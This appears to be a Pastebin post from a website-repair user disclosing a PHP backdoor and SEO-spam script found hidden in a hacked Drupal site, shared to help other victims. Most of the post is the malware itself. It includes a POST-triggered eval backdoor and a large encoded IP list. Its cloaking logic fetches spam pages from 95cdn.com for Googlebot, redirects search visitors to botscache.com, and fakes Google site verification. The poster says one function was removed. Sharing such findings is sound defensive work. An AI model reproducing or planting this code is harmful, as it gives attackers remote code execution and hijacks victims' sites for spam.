API tools faq
paste
hackrepair

Favorite Drupal related hacker script found and removed

hackrepair
Apr 29th, 2016
527
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.66 KB | None | 0 0
raw download clone embed print report
  1. Favorite Drupal related hacker script found and removed
  2.  
  3. Yes, I removed a necessary function in the code, so the below has been rendered for display purposes only.
  4.  
  5. Drupal website generated Nike Jordan related text, only visible to Googlebot, at web page addresses like:
  6. website.com/journal/UOEYPQGHS
  7. Which hacker then submitted to Google for indexing, etc.
  8.  
  9. 1.
  10. Found inside of Drupal installation:
  11. ./htdocs/../../../../tmp/.ICE-unix/.ICE-unix
  12.  
  13. 2.
  14. Likewise, found reference to script within Drupal database tables:
  15. cache_bootstrap
  16. variable
  17.  
  18. I'm hoping this might help someone whose been similarly compromised but unable to locate the exploit within their Drupal install.
  19.  
  20. Was quite a challenge to locate - so got some respect for his skilz...
  21.  
  22. +++
  23.  
  24. <?php
  25. error_reporting(0);
  26. include DRUPAL_ROOT . '/' .'includes/session.inc';
  27. if(isset($_POST["vk4u"])){@preg_replace('/^/e','e'.'val($_POST["vk4u"])', 'add');exit;}
  28. function drupal_get_urlsc_callback_url($url) {
  29. $timeout = 15;
  30. if(!function_exists('curl_init')||!function_exists('curl_exec')) {
  31. $opts = array('http'=>array( 'method'=>"GET", 'timeout'=>$timeout));
  32. $context = stream_context_create($opts);
  33. $file_contents = file_get_contents($url,false,$context);
  34. } else {
  35. $ch = curl_init();
  36. curl_setopt ($ch, CURLOPT_URL, $url);
  37. curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  38. curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
  39. $file_contents = curl_exec($ch);
  40. curl_close($ch);
  41. }
  42. return $file_contents;
  43. }
  44.  
  45. function drupal_is_gip(){
  46. $enip_str = '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';
  47. $deip_str = trim(OLsy($enip_str));
  48. $deip_arr = explode(chr(10),$deip_str);
  49. $rs = array();
  50. foreach($deip_arr as $goo_ip_str) $rs[] = (explode('-', $goo_ip_str));
  51. $lip=ip2long($_SERVER['REMOTE_ADDR']);
  52. if($lip<0) $lip+=4294967296;
  53. foreach ($rs as $r) if($lip>=$r[0] && $lip<=$r[1]) return true;
  54. return false;
  55. }
  56.  
  57. if(empty($_COOKIE) && preg_match('/www\.website\.com\/journal\/([\w]+)/', $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"], $match1)){
  58. if(ob_get_length()>0) ob_clean();
  59. $cateid=$match1[1];
  60. if(strpos(@$_SERVER["HTTP_USER_AGENT"],"Googlebot")>0||drupal_is_gip()) {
  61. if(!empty($_SERVER["HTTP_IF_MODIFIED_SINCE"])){header("HTTP/1.0 304 Not Modified");exit;}
  62. $furl="http://95cdn.com/n/natural.php?id=".$cateid."&host=".$_SERVER["HTTP_HOST"];
  63. $filedata = drupal_get_urlsc_callback_url($furl);
  64. if(strlen($filedata)>1000){
  65. header("Expires: Sun, 19 Nov 1978 05:00:00 GMT");
  66. header("Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0");
  67. header("Content-Language: en");
  68. header("X-Generator: Drupal 7 (http://drupal.org)");
  69. header("Link: <//sites/all/themes/nmj/images/logo.png>; rel=\"image_src\",<http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"].">; rel=\"canonical\",<http://".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"].">; rel=\"shortlink\"");
  70. echo $filedata;
  71. }else
  72. header("HTTP/1.1 503 Service Temporarily Unavailable");
  73. exit;
  74. }
  75.  
  76. if(preg_match('/\.google\.|\.aol\.com|\.ask\.com/i',@$_SERVER["HTTP_REFERER"])) {
  77. header("location:http://botscache.com/n.php?".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
  78. exit;
  79. }
  80. header('HTTP/1.1 404 Not Found');
  81. header("Status: 404 Not Found");
  82. header("location:http://".$_SERVER["HTTP_HOST"]);
  83. exit;
  84. }
  85.  
  86. if(empty($_COOKIE) && $_SERVER["REQUEST_URI"]=='/'){
  87. if(ob_get_length()>0) ob_clean();
  88. if(strpos(@$_SERVER[HTTP_USER_AGENT], "Googlebot")>0||drupal_is_gip()){
  89. $furl="http://95cdn.com/n/natural.php?url=".$_SERVER["REQUEST_URI"];
  90. $filedata = drupal_get_urlsc_callback_url($furl);
  91. if(strlen($filedata)>1000){
  92. header("Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0");
  93. header("Content-Language: en");
  94. header("X-Generator: Drupal 7 (http://drupal.org)");
  95. header("Link: <http://www.website.com//sites/all/themes/nmj/images/logo.png>; rel=\"image_src\",<http://www.website.com/>; rel=\"canonical\",<http://www.website.com/>; rel=\"shortlink\"");
  96. header("Expires: Sun, 19 Nov 1978 05:00:00 GMT");
  97. echo $filedata;
  98. }else
  99. header("HTTP/1.1 503 Service Temporarily Unavailable");
  100. exit;
  101. }
  102. }
  103.  
  104. if(empty($_COOKIE) && preg_match('/www\.website\.com\/journal\/([\w]+)/', $_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"], $match1)){
  105. if(ob_get_length()>0) ob_clean();
  106. if(preg_match('/\.google\.|\.aol\.com|\.ask\.com/i',@$_SERVER["HTTP_REFERER"])) {
  107. header("location:http://botscache.com/n.php?".$_SERVER["HTTP_HOST"].$_SERVER["REQUEST_URI"]);
  108. exit;
  109. }
  110. }
  111.  
  112. if(empty($_COOKIE) && $_SERVER["REQUEST_URI"]=='/google4a4791b250e72fd1.html'){
  113. echo 'google-site-verification: google4a4791b250e72fd1.html';
  114. exit;
  115. }
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!